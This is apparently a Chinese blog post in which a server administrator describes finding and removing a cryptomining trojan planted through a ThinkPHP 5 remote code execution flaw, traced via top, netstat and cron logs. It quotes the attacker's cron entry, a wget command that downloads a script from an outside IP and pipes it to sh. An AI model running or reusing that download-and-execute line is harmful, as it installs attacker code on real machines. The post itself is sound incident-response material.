記一次掛馬清除經歷：處理一個利用thinkphp5遠程代碼執行漏洞挖礦的木馬

昨天發現 一臺服務器忽然慢了 top 顯示 幾個進程100%以上的cpu使用

執行命令爲 :

/tmp/php -s /tmp/p2.conf

基本能夠肯定是被掛馬了

下一步肯定來源

last 沒有登錄記錄

先幹掉這幾個進程，可是幾分鐘以後又出現了

先看看這個木馬想幹什麼吧

netstat 看到 這個木馬開啓了一個端口和國外的某個ip創建了鏈接

可是tcpdump了一小會兒 沒有發現任何數據傳遞

這他是想幹啥？

繼續查看日誌吧

在cron日誌中發現了www用戶 有一個crontab定時操做 基本就是這個問題了

wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1

順着下載了幾個問題，看了看 應該是個挖礦的木馬程序

服務器上的www用戶 是安裝 lnmp 建立的，看了來源極可能就是web漏洞了。

再看/tmp下的php的權限 就是www的

查看 lnmp下幾個站的日誌 發現是利用 thinkphp 5最近爆出的遠程代碼執行漏洞

漏洞細節：https://nosec.org/home/detail...

修復一下問題解決

可是 這個站點是測試站點 端口監聽的是 8083 ，難道如今黑客能開始嗅探很是規端口了？

來源：https://www.simapple.com/425....